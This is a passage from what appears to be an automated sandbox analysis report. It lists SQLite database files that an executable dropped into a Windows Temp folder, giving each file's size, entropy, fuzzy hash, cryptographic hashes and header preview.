                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\sMuyr5nkV2

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\sSFW1PISqQ

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\swd8zHMLxb

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\sxDuRVCCTb

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\t1AptktL8r

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\tWr0qJlkMS

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\teb07kqcPs

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\tn4CwgjOJD

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\tszkw6YYfl

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\uGuBI2G8Ex

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\uJ3T69YKim

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\uNWJoRcCEM

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\uWTPn2lZll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ud6TWBQKyj

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\uiDCfJkyCa

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\usbEolFxT2

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\vH7H9MANOf

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\vxQvv7e2BY

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\w6QvdqobWW

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\wE9GMekMy8

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\wI7W6wyr9O

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\wTiivulFax

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\wdk8lRYvVI

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\weNaD9FkrU

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
